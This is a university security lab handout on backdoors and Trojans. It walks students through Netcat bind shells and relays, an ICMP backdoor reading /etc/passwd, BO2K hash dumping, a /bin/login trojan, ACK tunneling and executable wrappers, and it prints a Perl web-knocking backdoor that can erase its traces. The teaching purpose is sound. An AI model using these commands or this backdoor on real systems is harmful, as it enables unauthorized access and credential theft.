ECE 4112 Internetwork Security Lab 6: Backdoors and Trojans Group Number: _________ Member Names: ___________________ _______________________ Date Assigned: October 4, 2005 Date Due: October 11, 2005 Last Edited: November 21, 2005 Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due. Goal: In this lab you will learn how backdoors can be used to gain access to a computer. You will also see how Trojan programs can be used to create these backdoors. Summary: This lab consists of four parts. In the first part, you will use Netcat to gain access to a machine. In the second part of the lab, you will examine the properties of a Trojan by using a software package called Virtual Network Computing (VNC). Next, you will be using a Trojan program called Back Orifice 2000. Background: Read Counter Hack pp. 359-371, 399-422 Good reference website for relays: http://www.ists.dartmouth.edu/IRIA/knowledge_base/linuxinfo/nc-intro.v0.80.htm Tasks to be performed: Create new XP virtual machine Use Netcat to transfer files and create access to machines. Edit iptables to open ports through the firewall in Linux host Create a relay using Netcat. Use VNC software on windows and Linux. Use Back Orifice software to control a windows machine Setup MS Outlook Express in Windows XP Lab Scenario: This lab will require you to have a second virtual machine running on your host system. If you haven’t already made a copy, in one of the previous labs, follow the steps below to make one. 1 1 Creating a second Windows XP virtual machine In VMware the virtual machine files are stored in directories in your root directory by default. You just need to copy all the files from a machine's directory to a new one and then make a new machine using these files. In your Red Hat WS 4.0 physical machine's root/vmware directory make a new directory called winXPProCopy #cd /root/vmware #mkdir winXPProCopy Copy all the files from the winXPPro directory into this new directory. #cp winXPPro/*.* winXPProCopy/ This will take some time as the image file is quite large. Start VMware and click File->New->New virtual machine Choose custom and click Next. Select the operating system as Windows XP Professional. Change the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click Next. Click Yes at the warning. Adjust the virtual memory so that you can run all three machines at the same time. Bring it down to 128mb for now. Select Bridged networking and click Next. Choose “Use an existing virtual disk” and click Next. Click Browse and choose the file called winXPPro.vmdk in the new directory. Click Finish. This will create a new virtual machine on your host system. You will need to change the ip address of the new WinXP virtual machine. Change it to the old WinXP machine address + 1. For example, if it was w.x.y.z of the original XP machine, change it to w.x.y.z+1. To do this: Start the new virtual machine. If it gives you a warning about low memory just click ok as you won't be using this machine for too long. Click Start -> Control Panel Network and Internet Connections Network Connections Right Click on local area connections Properties Select TCP/IP Properties Make your changes and click OK Use VMware to stop the machine. Note: This is only a temporary setup and you won't probably use the second XP machine after this lab. We’ll call the original machine ‘XP Machine 1’ and the copy ‘XP Machine 2’. Section 1. Installing and Using Netcat 2 2 Note: Netcat for Linux may be obtained from the web at http://www.atstake.com/research/tools/network_utilities/ Installing Netcat on the Windows machine Start your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2). Installing Netcat on the Linux machine You should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t, get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools directory and execute the following commands: #tar xvfz netcat.tar.gz #cd netcat #make linux #cp nc /usr/local/sbin The last command will allow you to run Netcat without having to specify this directory. Using Netcat The executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use #nc [IP Address to send to] [Port to send to] (e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d) All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use #nc [IP address to send to] [Port to send to] < [File to read from] (e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt) To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are: -l specifies that Netcat is running in listening mode -p specified which port Netcat should listen on -v verbose mode so that all results are displayed -w maximum amount of time (in clock ticks) to wait for a response -z specifies that Netcat should send very minimal data, usually a synchronized packet to see if a response is obtained -e Allows Netcat to execute a program to receive or generate network traffic Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme. To run Netcat in listen mode, use the -l and -p options. The command syntax would be: 3 3 #nc -l -p [port to listen to] If you want to store the input that is received, you can pipe all the received data to a file, using the following command: #nc -l -p [port to listen to] > [file to write to] (e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to testfile.txt). NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten. Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this): #echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan] (e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the system with IP address a.b.c.d) Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command (from the nc11nt directory): #nc -l –p [port to listen to] -e cmd.exe (e.g. nc -l -p 7777 -e cmd.exe This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands. ) On the client side, simply type #nc [listening machine] [port to connect to] (e.g. nc a.b.c.d 7777) and start typing in your commands. A fourth popular use of Netcat is to create relays whereby an attacker uses several intermediate systems while actually attacking a target system. Thus, detection of where the attack originated from is very painful and sometimes impossible process. Exercise 1.1: Netcat File Transfer Use Netcat to transfer the password file from your Linux to your Windows machine. Store the data you receive in passwd.txt. Now try transferring a binary file (e.g. .rtf file) from the Windows system to the Linux system and then transfer it back to the Windows system, saving it under a different filename. Q1.1.1. Is the binary filing the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth. Q1.1.2. What can you say about Netcat’s ability to transfer binary files? 4 4 Exercise 1.2: Netcat Backdoors This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener on your Windows machine. Use the options to pipe the output to cmd.exe shell. Select any port number to listen to and connect to this backdoor by running Netcat in client mode on your Linux machine. Now type in some simple DOS commands like dir and mkdir. Then try running some complex commands and examine the extent of information that you can gain from the system. Q1.1.3. What do you conclude from this? Exercise 1.3: Netcat Relays Note: This exercise requires the use of both the windows machines. In this exercise you will create a relay on your Linux machine using the Netcat listener and client. This relay will forward data from one windows machine to the other. The Netcat client will be running on the first XP machine while the listener will be running on the second XP machine. Once established, the relay should allow you to access the second XP machine from the original XP machine. First create a backdoor shell on the new XP machine, using the Netcat listener. You can create a backdoor shell by # nc -l -p <listening port> -e cmd.exe (e.g. nc -l -p 56789 -e cmd.exe) Creating a relay A way to create a relay is to tie the input and output of a Netcat listener and client together using a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out mode. You can create a FIFO and use it to link a Netcat listener to client by typing the following in Linux: # mknod backpipe p # nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe portA – Port on which the relay is listening portB – Port on the target machine on which the backdoor shell is listening target computer – The target XP machine (XP Machine 2). Make sure its ip is different from your other XP machine. Note: Do not put spaces around the '<' or '>' signs. They direct the standard input and output streams in Linux, into backpipe and cannot have spaces next to them. e.g. nc -l -p 12345 0 <backpipe | nc e.f.g.h 56789 1 >backpipe The line above creates a relay listening on TCP port 12345 and forwards the data to TCP port 56789 of the machine on which the backdoor shell was created. 5 5 For this relay to work, you have to allow packets into the listening port on your linux machine. If the default Linux firewall iptables is running, it won’t allow these packets. So disable it by typing # /etc/init.d/iptables stop After creating the relay and listener, connect to the relay by typing #nc [relay machine] [portA] on the original XP machine. Now try some other commands on the target machine and see what all you can do. Run the command called ipconfig in the shell. This will show you the ip address of the target machine. Open up another cmd.exe window on your client machine and do ipconfig again to see the ip address of the machine you’re connecting from. Position these windows so that both the ip addresses are visible. Take a screenshot of these windows and submit it with your report. You can use the “Print Screen” key to capture the screen and then paste it into the paint application. (Screenshot #1) Hint: In this exercise, you used Netcat the following four times: 1. As a listener in the relay on your Linux machine 2. As a client in the relay on your Linux machine 3. As a listener, running the shell on the second XP machine 4. As a client on the first XP machine, where commands can be typed to be sent to the relay. Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow. Exercise 1.4: Other uses of Netcat Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail). Q1.1.6. What defenses could you use against an attack like a netcat backdoor? Section 2. Icmp-backdoor In this exercise, we are going use another backdoor that exploits the ICMP protocol to get a remote access shell. You should have two RedHat 7.2 virtual machines running to do this exercise. 6 6 If you haven’t already, go ahead and connect to the NAS server and copy the file, icmpbackdoor.tar.gz (from mnt/nas4112/Tools/Linux) , to both of your virtual machines, and extract the contents with the following command: # tar zxvf icmp-backdoor.tar.gz Go into the icmp-backdoor directory. In one virtual machine, we are going to compile the server part of this program (which shall be referred to as the “Server machine”) with the command: #make server In the other virtual machine, we are going to compile the client part of this program (which shall be referred to as the “Client machine”) with the command: #make clien You will need to follow the same copy and extract procedures you did with the other Linux machine. Next, we are going to start the server program on the Server machine (think of this as installing the backdoor on an infiltrated machine). To do this, run this command: #./ibd-server 0 The “0” refers to the ICMP code for “Echo reply” packets. We are setting this server to reply back with its output in response to “Echo request” packets. This is important in order to make the connection we want. Refer to Figure 1 to ensure you have run the proper commands up to this point. 7 7 Figure 1. Installing and running the icmp-backdoor server. Next, run ethereal on your RedHat 4WS machine. When we run commands off of this icmpbackdoor connection, we are going to see how data is transferred through the ICMP protocol. In order to run the client and connect to the icmp-backdoor, run the following command on the Client machine (where w.x.y.z is the IP address of the Server machine): #./ibd-client w.x.y.z 8 The “8” refers to the ICMP code for “Echo request” packets. We are setting this client to send echo request as input to the icmp-backdoor server. If we did this correctly, we will have a connection established by exploiting the echo-request <-> echo-reply communication of the ICMP protocol. Refer to Figure 2 to ensure you have run the proper commands up to this point. Figure 2. Installing and running the icmp-backdoor client. You should be connected by now… so let’s do stuff. For example, we ran the ls command, and it shows the directory listing of the Server machine, as shown in Figure 3. 8 8 Figure 3. Running ls on the Server machine through the icmp-backdoor client. While we’re at it, go ahead and run the whoami command just to see what privileges you have. Okay, now let’s do something slightly more malicious. While we cannot use programs like vi over this type of connection, we can still run simple commands to retrieve sensitive information. Let’s see the password file! To do this, run the command “cat /etc/passwd” which should print out on the client terminal the contents of the password file as shown in Figure 4. 9 9 Figure 4. Running cat /etc/passwd to print out the contents of the Server machine’s password file. So if we were a hacker, we could just copy the output from this screen to a text file and then run a password cracker to decipher passwords. Go ahead and have fun running more commands to see what else can be done over this icmp-backdoor. Once you’ve had your fun, close the connection by running the exit command on the Client machine. Now go back and stop your ethereal capture on your RedHat 4WS machine. You should able to scroll down and see the ICMP packet exchanges that were made due to the commands you ran. Highlight one of these packets by clicking on one of them, and move the bottom scollbar to see the contents of the ICMP packet as shown in Figure 5. 10 10 Figure 5. Ethereal output showing an ICMP packet due to the backdoor connection. You should notice that the content of what you saw in your backdoor client is visible in the actual ICMP packets. Go ahead and take a screenshot of the ethereal output and turn it in with your lab. Just for your information, there are some developer groups that are trying to enhance this type of backdoor with encrypting the ICMP contents and hiding the backdoor server’s process id. That is all for this exercise. Take a screenshot of the ethereal output (screenshot #2) Q2.1.1. What defenses could you use against an attack like icmp backdoor? Section 3. Installing and Using Virtual Network Connection (VNC) You can obtain VNC from the web at http://www.realvnc.com/ VNC is an application level Trojan backdoor. It allows remote access to a system, and can be 11 11 used for legitimate remote system administration purposes. However, it can also be exploited by hackers since VNC allows a person to change all configurations that they have permission to change. Typically, the VNC server is installed on the system that is to be remotely administered and the client is installed on the administrator’s system. Therefore, if the server was installed by a user with administrator privileges and is running under that account, an attacker that uses the VNC server would have full access to all functions of the system. Installing and Using VNC on the Windows Machine Copy the file vnc_x86_win32 folder from the NAS server’s tools/Windows folder to the tools folder on your hard drive. 1 Change into the vnc_x86_win32/winvnc directory and double click the Setup program 2 Click OK on warning about installation of previous version. 3 Click Next 4 Click Yes on License Screen 5 Click Next for destination location default 6 Click Next for Program, Folder default 7 Click Finish To run the Windows VNC server, 1. From the Start menu, select All Programs ->VNC -> Run WinVNC (App Mode) 2. Enter a password to be used for VNC connections. Remember this password as it will be required for access to the VNC server by a client. This password prevents other attackers from using the VNC server 3. Click OK. The server is now waiting on the Windows machine. To run the Windows VNC client, simply click on “Run VNCviewer”. You will be prompted for the IP address of the system on which the server is running and the password to access that server. Once you have entered both, you should see a GUI come up with a terminal window. Installing and Running VNC on the Linux Machine Switch to the /home/tools directory, where you extracted all the linux tools, and run the following command: #tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgz Go into the VNC directory that is created. You will see that there are five different executable programs. Go ahead and read the README file as this will provide you with explanations about what each of the executables do. For example, to run the VNC client, simply type # ./vncviewer When prompted for the machine of which the server is running, type in the Windows machine’s IP address. At the next prompt, type in the password. And then you should see a GUI of the Windows machine appear on the Linux system. To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin directory. This puts them in the Linux path. To do this type #cp vnc* /usr/local/bin #cp Xvnc /usr/local/bin 12 12 Then simply type #vncserver Establish a password for the connection and remember this to connect to the Linux machine. Make sure that after using VNC on the Linux system, you end each VNC process after completion, otherwise the port that it listens on will be incremented when the next VNC process is created. NOTE: To make sure that you can connect to the VNC server running on the Linux system, you have to modify the iptables to allow connections to TCP port 5901 since this is the port that the VNC server runs on by default. Access to this port is normally blocked off (to check this out, run nmap on the Linux system) by the built in firewall in Redhat. Instructions on how to edit the iptables list are given below. Note that the change you make to the iptables is only temporary and will be lost the next time you reboot the system. Modifying IP tables: To allow packets coming in destined for the VNC server, type: # iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT If you still cannot connect from Windows then you might need to enter the exact port you just opened in the firewall. To do this, when you enter the host in VNC viewer, enter host:port e.g. a.b.c.d:5901 On Windows, you will see another virtual desktop, not the normal user’s desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows. Exercise 3.1: Windows VNC Server Set up a VNC server on your windows machine and connect to it from your Linux machine using the Linux VNC viewer. Try running a couple of different programs, including the password cracking software. Since you are logged on as an administrator, you should be able to do anything. Q3.1.1. How would you detect that VNC was installed and/or running on your Windows machine? Exercise 3.2: Linux VNC Server Start a VNC server on your Linux machine and try to control it from your Windows machine using Windows VNC viewer. Run several different programs as well as view the password and shadow files. Q3.1.2. How would you detect that VNC was installed on your Linux machine? Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer 13 13 (Windows) accessing the VNC server. Turn these in with your report. (Screenshots #3, #4) An easy way to take a screenshot in is to press the Print Screen key. A window will come up, asking you for the name of the file. The format PNG is a standard picture format that can be printed from your linux lab printer or a Windows computer. Q3.1.3 What defenses could you use against an attack like VNC? Section 4. BO2K BackDoor Back-Orifice is one of the most well known Trojan/backdoor applications available. It is important that you do not transfer this file off of these computers and to any ECE machines as most modern virus scanners will mark this file as malicious. The Bbo2k_1_0_full file can be copied from the NAS Server under the folder of Tools\Windows. Copy the file to the desktop of one of your Windows XP virtual machines. Double click on the program and then run through the installation process. After installing, open the program “BO2k Configuration Tool”. Click next through the initial startup screen. The next screen allows you to rename the server, you can just keep it named “bo2k.exe” for this lab. The next screen determine whether to use TCP or UDP, just leave it as TCP. Select a port number to run on the next screen (select something over 1024 e.g. 30000). Click next through the next screen. Enter a passphrase on the next screen since we chose “XOR” just choose something like “ece4112”. Now finish the configuration wizard. Now the real configuration program opens. Click “Open server” and select the file name “bo2k.exe”. Now click “Save Server”. And exit the program. Now this bo2k.exe file needs to be transferred to the victim machine using the shared folders available through VMWare tools. To do this: 1. Right-click on the WinXP virtual machine tab in VMWare and click Settings. Now click on the Options tab. Click on Shared Folders and make sure that it is enabled. If it isn’t, check the Enable Shared Folders checkbox. Now click Add… near the bottom of the window and select the folder which you want to share (suggestion: you might want to create and share a directory called root/vmware/shared). Enter a name for the shared resources (“Shared Folder”). 2. Repeat the above for the XPPro Copy machine. 3. Now open My Computer in the XPPro machine and click Tools->Map Network Drive. 4. Use the default drive letter for “Drive:” and click Browse to locate the shared folder. 5. Expand VMWare Shared Folder and select the folder which you shared in step 1. 6. Repeat step 4 for the XP Copy machine. Now, anything copied to the network drive will be available to both machines. 14 14 On the victims machine double click the bo2k.exe file you transferred. You have now installed the backdoor on the victim machine. Go back to the Windows copy virtual machine. On the non-server machine open the BO2k client program. Click file->new server and fill in the IP address of your target machine and connect to it. Play around with some of the tools now available to you. Have BO2k list the password hashes for the victim machine and take a screen shot of this. Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the password hashes of the victim machine. Another such tool to control a remote XP machine is “Let Me Rule” (http://www.pinoyhaker.net/modules.php?name=Downloads&d_op-viewdownload&cid=1#cat). This program packages a lot of the individual tools that we have played with, including a video stream, key logger and an ftp server. Section 5: Using a Simple Backdoor Program in C Suppose you want to install a backdoor on a compromised linux machine. This nifty C program (utrojan.c – see source code below) allows you to hijack login, imapd and/or qpopd. For this exercise, we’ll overwrite login and access the victim machine via telnet. The program can be obtained from: http://packetstormsecurity.org/UNIX/penetration/rootkits/utrojan.c This program overwrites the /bin/login command. While telneting to a victim machine, it provides a “1 second time frame” in which you need to enter the password “door”. If you enter this correctly, it executes /bin/sh, thereby giving you root access (from any user account installed on the compromised machine). If you don’t enter in “door” correctly, within the time frame, the program defaults to the original login script, saved as /bin/.login. Make sure that telnet is running on the RH7.2 machine. On the RH7.2 (victim machine): 1. Copy utrojan.c from the Lab6 folder on the NAS to /bin directory 2. Go to /bin directory and back up the login file # mv login .login 3. Compile utrojan.c # gcc –o login utrojan.c On a WinXP machine: 1.Open the command line 2.Telnet into the RH72 machine: (you may need to start telnet by using ntsysv on the RH7.2 machine and rebooting) C:\> telnet <ip address> 15 15 3.Within 1 second, type “door” and press enter 4.You should see the # prompt 5. Type whoami (you should be root) Take a screenshot of this remote access. (#6) On your RH7.2 machine move the backup .login file back to login to stop this backdoor. Section 6: Backdoor Detection In the preview sections, we looked at tools that install backdoors on systems. We asked you how you would detect these backdoors. One probable answer is to look for suspicious ports that are listening for connections. How can we do this? There are two windows tools, TCPView (http://www.softpedia.com/public/cat/10/7/10-7-12.shtml) and Active Ports, that do exactly that. Download the executable installer for TCPView from the NAS to one of your Windows XP machines. Extract the zip file. Click on Tcpview.exe. Take note of the processes running, the protocols they use, the local and remote addresses, and the state. Now run the Netcat listener by opening a command prompt and typing: nc –l –p 7777 –e cmd.exe Look back to TCPView. You should see a new process “nc.exe:xxxx”. The local address should be xp:7777 and the state should be listening. Take a screenshot (#7) Now right click on the nc.exe process in TCPView and select “Process properties…” You should see a pop up box with the path on the nc.exe program and also the command line arguments used to execute the program. Take a screenshot (#8) To end a malicious process, right click on it and select “End Process….” You have just closed a backdoor. Section 7: Walkthrough Firewalls with Ack Tunneling In an effort to maintain access to exploited boxes, hackers install backdoors. You have already seen how a shell can be tunneled over ICMP messages. However, virtually all sysadmins have blocked ICMP at their firewalls. Assuming you have access to the firewall rule set, you could install a regular TCP server daemon and open a hole in the firewall. But such a hole can easily be detected when a sysadmin scans his network. Fortunately, there is an alternative: ACK tunneling. 16 16 ACK tunneling does exactly what you would expect, it tunnels network traffic over TCP ACK packets. The key advantages of this is that stateless firewalls allow any packet with the ACK flag set as it assumes they are packets from a pre-existing connection. This allows us to send the ACK packets right through the firewall and make a connection with the backdoor. Note that this will not work on stateful firewalls as stateful firewalls keep the state of the active connections. Fortunately, most firewalls are stateless. Stateless firewalls include the windows firewall, most router/switch firewall boxes, and many high-traffic firewalls as statefulness is cpu-intensive. Another advantage of ACK tunneling is that you can ACK scan with nmap through a firewall and find all of the infected machines behind the firewall. So, for example, if you can get the server installed on a bunch of targets in a company via an e-mail worm, then a simple nmap ACK scan of the company from outside the firewall will show all the infected machines. This has the advantage of not having a callback in the server which could reveal the attackers identity. Lastly, most firewall logging systems only log SYNs, as a result our ACK traffic will not be logged. Ame Vidstorm has released a proof-of-concept ACK tunneling cmd.exe backdoor called ackcmd. It consists of two parts, the server which listens on the target box, and the client which the attacker uses. The client sends the port 80 to the server listening on 1054. These port numbers look surprisingly like web traffic. For this demo, you will need two XP machines. Get the file ackcmp.zip from the NAS to both WinXP boxes. On the victim machine: Unzip ackcmd.zip and run AckCmdS.exe from the command line # AckCmdS.exe On the attacker’s machine: Unzip ackcmd.zip. Open ethereal on your RH WS4 machine and capture this process. Back on the attacking machine: “AckCmdC.exe <victim IP>” from the command line #AckCmdC.exe <victim IP> #ipconfig #quit Take a screenshot (#9) from the attacking machine. Examine the packets in ethereal. You can kill ACkCmdS.exe on the victim’s box by <ctl>-<alt>-<del>, select processes, select AckCmdS.exe and click End Process. 17 17 Section 8: Port Knocking As you have seen, closing ports at the firewall is one of the best ways to secure a system. Unfortunately, even if you close all unused ports, the services you are offering such as SSH, HTTP, IMAP, etc. must have their ports open to allow connections. However, port knocking allows for a server to close *ALL* ports (including those of services offered) while still allowing connections to services. The basic principle is simple: when a user wants to connect to a closed service, he sends packets to multiple closed ports in a secret order. If the port knock sequence is correct, the server acts accordingly, such as by opening a port. Despite the simplicity of the basic concept, there are several details which deserve discussion. The most important detail is encryption; what happens if someone sniffs your knock sequence? Under our simple description, they could merely replay the sequence and access the service. Fortunately strong encryption can be integrated into the knock sequence to create a sequence that is just as secure as SSL or SSH. The client and server can share a key, the key is then combined with the source IP, port and other data. This data is encrypted and converted into a sequence of protocol/port numbers to knock at. The server can decode and act on the request such as by opening a specified port to/from the source IP explicitly. Even if an attacker replayed the sequence, data such as the source IP and timestamp would fail to match, thus resulting in an invalid knock sequence. It is also worth noting that there is no way to detect a host accepting port knocks. The server drops all packets on the floor and doesn't even respond to a successful knock. The only sign of success is the open port. Obviously port knocking cannot be used on a public services. It would make no sense to require a port knock from everyone to access your public web server. But port knocking does prove very useful for restricted-access hosts. One related common misconception is that a box which drops packets appears to the world as if it were off/disconnected. Unfortunately, this is not the case. The difference is how the nexthop router responds to the packet. For a box that is connected but dropping all packets, the attacker will receive *NO* response. However attempting to connect to a host that is off/nonexistent will result in an ICMP Destination Unreachable from the last router before the target. This is because a connected but dropping host still responds to the routers ARP packets, thus the host is in the router's ARP table. Whereas a host that is off/non-existent will not have an entry in the router's ARP table and will not respond to ARP requests, thus resulting in the ICMP packet. Port knocking actually originated from a virus where the attacker included a simple port knocking implementation to allow for backdoor access to infected machines. When it was first announced as a mainstream security measure, port knocking was heavily criticized as securitythrough-obscurity. However, with the recent addition of encrypted knock sequences, port knocking is becoming an acceptable additional layer of security. Unfortunately, there are few implementations available and even fewer production quality releases. Today we will use an port knocking implementation called fwknop (Firewall Knock Operator) that was released in 2004 at DEFCON 12. According the fwknop website: http://www.cipherdyne.org/fwknop/: "fwknop implements network access controls (via iptables) based on a flexible port knocking mini-language, but with a twist; it combines port knocking and passive operating system fingerprinting to make it possible to do things like only allow, say, Linux-2.4/2.6 systems to connect to your SSH daemon. fwknop supports shared, multi-protocol port knock sequences 18 18 along with both relative and absolute timeouts, and coded port knock sequences encrypted with the Rijndael block cipher." On your RH WS4 machine connect to the NAS and get the file “fwknop-0.4.2.tar.gz” from the Lab6 directory. Move this file to your /root directory. # cp ~ # tar xvfz fwknop-0.4.2.tar.gz # cd fwknop-0.4.2 # ./install.pl [+] Would you like access alerts sent to a different address ([y]/n)? n [+] Enable fwknop at boot time ([y]/n)? y Do the following steps to make sure the packets are logged: # service syslog start # iptables –F # iptables –A INPUT –j LOG --log-tcp-options --log-ip-options --log-prefix “DROP:” –p tcp –m state --state NEW # iptables –A INPUT –j DROP –p tcp –m state --state NEW # service iptables status Lets modify fwknop to allow us to connect to any port using an encrypted knock: Modify the following lines in /etc/fwknop/access.conf: KEY: <choose a key at least 8 chars long>; This will open a firewall port for the source IP address of anyone who knows the key. Note that the desired firewall port to open is specified by the client. There are two daemons required for fwknop to function correctly: fwknop and knopmd. knopmd reads the iptables logfile and extracts port knocks into a named pipe. The named pipe is then read by fwknop which interprets the port-knocks and adds/removes iptable rules accordingly. It is critical that both daemons are always running, as a result there is a third daemon, knopwatchd whose sole purpose is to ensure both knopmd and fwknop are running and to restart them if they stop. To start fwknop, we will run the monitoring daemon: # knopwatchd The server is now listening for port-knocks, lets try to connect. For simplicity we will attempt to connect from the localhost, this is essentially identical to a remote connection since all hosts, including loopback, should be blocked before we port-knock. # fwknop -e -k localhost -s -p 22 -P tcp -e: use encryption 19 19 -k: port-knock target -s: allow source IP -p: port to open -P: protocol of port to open After you enter your password, you should see the knock sequence. Notice that there is no sign of success. All you can do now is attempt to SSH into localhost, which should work now. # ssh localhost You can also check the firewall ruleset to see if your special rule has been added: # service iptables start There are many interesting things you can do with fwknop. Explore the manpages and the config files in /etc/fwknop to grasp the available features. One intriguing feature of fwknop is its bundling of the passive OS fingerprinting tool p0f. This allows you to restrict port-knocks to specific host OSes. The available OS fingerprints are in /etc/fwknop/pf.os. 1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8 subnet to access port 22 using an encrypted knock sequence. 2) It was mentioned that port knocking began with a virus. Why would a virus writer want to include port knocking in the backdoor. 3) No mention was made as to how port knocking servers finally close the open firewall port. List 2 ways which could be employed to close the port. Section 9: Tricking Users into Opening Backdoors One way in opening backdoors is to have the very users of the machines open them for you. One great way to do this is by sending the user a file that looks and feels safe. Programs known as “wrappers” combine a series of files into one executable file. Once the wrapper file is opened, all the wrapped files start to execute. The execution can be in series or in parallel, depending upon the wrapper. We will use one of the best known wrapper utilities: eLiTeWrap v1.04 http://homepage.ntworld.com/chawmp/elitewrap On a windows XP machine, go into the Lab6 directory on the NAS. Make sure that the “elitewrap” folder is there. Copy this to your desktop and unzip it. Note that there is nothing to install. Open up a command prompt and change directory to the “elitewrap” folder. Elitewrap is command line driven. View the readme.txt file now and make sure you have a clear understanding of the usage of elitewrap. 20 20 We will now create a totally harmless executable. We will create a wrapper that will execute calc.exe and notepad.exe. We will make it so that all the user sees is the calculator when they open the wrapper executable. We also want notepad.exe to open after the user has closed the calculator, and we also want it to be invisible. Before proceeding, be sure to close all instances of “notepad” and “calc”. Press Ctrl-Alt-Del and verify that neither “notepad.exe” nor “calc.exe” appears under the processes tab. In the command prompt, follow the steps: 1. Run the executable elitewrap.exe from the appropriate directory. 2. Enter name of output file as “NewCalculator.exe” 3. Perform CRC-32 checking? No 4. Enter package file #1: C:\Windows\system32\calc.exe 5. Enter operation: 4 6. Enter command line: <blank> 7. Enter package file #2: C:\Windows\system32\notepad.exe 8. Enter operation: 9 9. Enter command line: <blank> 10. Enter package file #3: <blank> In the Windows GUI, go into the “elitewrap” folder and you should now see a new file named NewCalculator.exe. Double click on NewCalculator.exe and the calculator program should open up. Now check the processes tab. Notice how calc.exe is a running process (and still no instance of notepad.exe). Close the calculator program. Q10.1.1 Does the notepad program appear after closing the calculator program? Go back to the processes window. Q10.1.2 Can you see notepad.exe in the processes window this time? Q10.1.3 How do you detect a Trojan of this kind? There are other programs like Silkrope (http://www.softpedia.com/public/cat/1/1-47.shtml) which allows an attacker to create a Trojan. For example, if you have an installer for Quake called quake.exe and an installer for a backdoor program like the ones we examined above, silkrope allows you to combine these two installer programs into a single executable file. Thus, when you launch the installer for Quake, the backdoor program gets installed in the background without the user being aware of it. It might then send out a message over the network to attackers signaling that the machine has been compromised. Section 10: Web Knocking 21 21 Since traditional port knocking requires that the machine needs to be reachable at any of its ports, firewall rules can easily be setup to protect machines such as Web Servers and Mail Servers that render services at specific ports. The concept of Web knocking involves sending HTTP requests to a web server. These may be invalid requests or requests to pages which do not exist. These requests contain, embedded in them, commands to be executed. The primary difference between port knocking and web knocking is that if a firewall exists, all port knocking attempts can be thwarted, however, web knocking attempts will still be let through, since the firewall, by default will have to allow traffic on port 80 to reach the web server. User Port knocking attempts are blocked by firewall 9250 5250 2234 1250 404 Web knocking requests are allowed to pass through firewall. 80 80 Web Server Firewall (Only port 80 open) Port knocking v/s Web knocking For further details: (You may have to use Google Translate ® ) [http://semaphor.homeunix.org/semaphor.php?item=webknocking] (Our version of web knocking is simpler, wherein the knocking code is just a single page. The implementation can be extended to include a complex knocking sequence which opens up a port or sets up a remote shell) We have created a proof of concept web knocker script in Perl. This program performs the following tasks: 22 22 a. Define the knocking code (The value in $var, defines the knocking code used to activate the web knocker) b. Extract all lines from the apache error_log which contain the knocking code (This is done so that we can see whether someone has sent the knocking code) (We search the error_log, since this is the place all 404 File not found errors are) c. We see which commands have already been executed and ignore those d. For each unexecuted command, we execute it. (If we were to run this is stealth mode, the output would not appear on screen) e. If we wish to erase all traces of our web knocker, we send the command “clean_up” following the knocking code. ( http://target/command_to_execute=clean_up ) knock.pl $var = "command_to_execute="; $fname = "cmd_exec"; #Knocking code which precedes a command #Temp FileName system("cat /var/log/httpd/error_log | grep $var > $fname.new"); #Extract all lines from the log file #which contain knocking code if(! -e $fname. ".old") { system("touch $fname.old"); #Create a blank file if it does not exist } system("diff $fname.new $fname.old > diff_file"); #Find the commands which have not been executed $LOGFILE = "diff_file"; open(LOGFILE) or die("Could not open diff file."); foreach $line (<LOGFILE>) { $index = index($line,$var); $strt = $index + length($var); #print "Starting : $strt : "; $cmd=substr($line,$strt); #Extract the command to be executed if (! $cmd eq "") { if($cmd eq "clean_up") { system("rm -f $fname.*"); #Clean up temp files system("rm -f $LOGFILE"); #We can also remove all traces from the logs as well exit(1); } print "Executing : $cmd"; #Tell the user the command is executing # Can be commented out if running in silent mode system($cmd); #Execute Command } } close(LOGFILE); system("mv $fname.new $fname.old"); #Store all completed commands in old file 23 23 We would ideally run this script as a cron job to ensure that it is constantly running in the background, instead of running it in a while loop, because of which it will show up as a running process. Setting up Web Knocking: [On the RedHat7.2 machine] 1. Start the httpd daemon: $ service httpd start 2. If the httpd daemon is not installed, install it using $ rpm –uvh <apache installation file> 3. Once the http daemon has started, 